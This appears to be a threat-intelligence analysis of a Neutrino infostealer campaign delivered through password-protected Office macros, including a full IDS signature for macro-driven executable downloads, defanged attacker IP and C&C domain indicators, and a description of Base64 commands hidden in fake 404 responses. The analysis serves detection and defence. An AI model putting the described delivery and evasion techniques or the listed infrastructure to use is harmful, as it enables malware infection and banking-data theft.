Malware campaign — Neutrino infections

Below is an analysis of the Neutrino Trojan. Among recent malware campaigns employing Neutrino, in which an Office suite attachment serves as the initial infection stage, a technique has recently been introduced to increase message reliability and bypass automated malware analysis systems.

Delivery Method

The infection technique and malware campaign typology present no novelty in the context of malware infections, having been well documented for some time.

Infection occurs via email with a password-protected malicious attachment. The password is contained within the email body. This compels the user to treat the attachment as trustworthy.

Upon entering the password, the document appears as follows:

Should the user enable the Macro, it proceeds to download and execute additional malware components on the now-compromised system.

Network Analysis

From a network security perspective, infection within a controlled virtual environment generated a significant volume of IDS (Intrusion Detection System) alerts with precise signatures identifying the threat typology:

Alerts were also generated regarding the download of an executable file (.exe) and its download directly from an IP address (dotted-quad).

More precise is the anomaly “ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016,” which allows us to identify a typical malicious behavior frequently employed in these campaigns: malware download via MACRO.

IDS signature details:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:”ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016″; flow:established,to_server; content:”GET”; http_method; content:”.exe”; http_uri; nocase; fast_pattern:only; content:”Accept|3a 20|*/*|0d 0a|”; depth:13; http_header; content:”Accept-Encoding|3a 20|gzip, deflate|0d 0a|”; http_header; content:”User-Agent|3a 20|Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| Windows NT”; http_header; content:!”Referer|3a|”; http_header; content:!”Cookie|3a|”; pcre:”/(?:\/(?:(?:p(?:lugins\/content\/vote\/\.ssl\/[a-z0-9]|a(?:nel\/includes\/[^\x2f]+|tric)|o(?:sts?\/[a-z0-9]+|ny[a-z]*)|rogcicicic|m\d{1,2})|s(?:ystem\/(?:logs|engine)\/[^\x2f]+?|e(?:rv(?:au|er)|ct)|vchost[^\x2f]*|gau\/.*?|alam|ucks|can|ke)|(?=[a-z]*[0-9])(?=[0-9]*[a-z])(?!setup\d+\.exe$)[a-z0-9]{5,10}|in(?:voice(?:\/[^\x2f]+|[^\x2f]*)|st\d+|fos?)|a(?:d(?:min\/images\/\w+|obe)|salam|live|us)|m(?:edia\/files\/\w+|a(?:cros?|rch)|soffice)|d(?:o(?:c(?:\/[a-z0-9]+)?|ne)|bust)|(?:~.+?\/\.[^\x2f]+|\.css)\/.+?|c(?:onfig|hris|alc)|u(?:swinz\w+|pdate)|xml\/load\/[^\x2f]+|(?:[Dd]ocumen|ve)t|Ozonecrytedserver|w(?:or[dk]|insys)|t(?:mp\/.+?|est)|fa(?:cture|soo)|n(?:otepad|ach)|k(?:be|ey|is)|ArfBtxz|office|yhaooo|[a-z]|etna|link|\d+)\.exe$|(?:(?=[a-z0-9]*?[3456789][a-z0-9]*?[3456789])(?=[a-z0-9]*?[h-z])[a-z0-9]{3,31}\+|PasswordRecovery|RemoveWAT|Dejdisc|Host\d+|Msword)\.exe)|(?:^\/(?:image\/.+?\/[^\x2f]+|x\/setup)|[\x2f\s]order|keem)\.exe$)/Ui”; content:!”.bloomberg.com|0d 0a|”; http_header; nocase; content:!”.bitdefender.com|0d 0a|”; http_header; classtype:trojan-activity; sid:2022550; rev:15; metadata:affected_product MS_Office, attack_target Client_Endpoint, deployment Perimeter, tag MalDoc?, signature_severity Major, created_at 2016_02_18, malware_family MalDocGeneric?, performance_impact Low, updated_at 2016_07_01;)

The details just presented are those an analyst considers during the initial analysis phases, obtaining important information regarding the infection process and what is occurring.

Going into greater detail, it is possible to extract information regarding threat typology and extract IOCs (Indicators of Compromise) for extended searching within systems and infrastructures. Through Cyber Threat Intelligence capabilities, these indicators are shared within the MISP Community of the EthicalSec association.

During analysis, 2 distinct servers belonging to the attacker’s infrastructure were identified:

• 209[.]141[.]59[.]124
  • Malware Delivery Server (from which the executable file “1.exe” is downloaded)
  • Server: USA
• securityupdateserver4[.]com//47[.]254[.]203[.]38
  • C&C Server (for control and management of infected systems)
  • Domain Name: WhoisGuard Protected Panama
  • Server: Malaysia

Command & Control

By isolating communications with the command and control server, it is possible to identify the threat type:

During the first 2 requests, the malware downloads malware components (GET requests).

The 8 POST requests to the “tasks.php” page represent the exchange of instructions between server and infected workstation.

The content of the communication is of particular relevance for identifying the malware typology. In this case, the request made by the “victim” and the server’s “404 Not Found” response can be observed.

Within the request is the text “ZW50ZXI=” which is “enter” (Base64).

The response, an apparent 404 error, instead contains the instructions: “Yir/iIr0Rw==”. The malware has established communication with the attacker’s server.

This information allows us to link the infection to the Neutrino Malware. An InfoStealer targeting the acquisition of information related to banking data (including from POS terminals). Kaspersky Analysis

Macro-based delivery mechanisms combined with obfuscated command protocols remain effective vectors for establishing persistent infrastructure access, particularly when coupled with legitimate-appearing network infrastructure and Base64-encoded command channels that evade signature-based detection.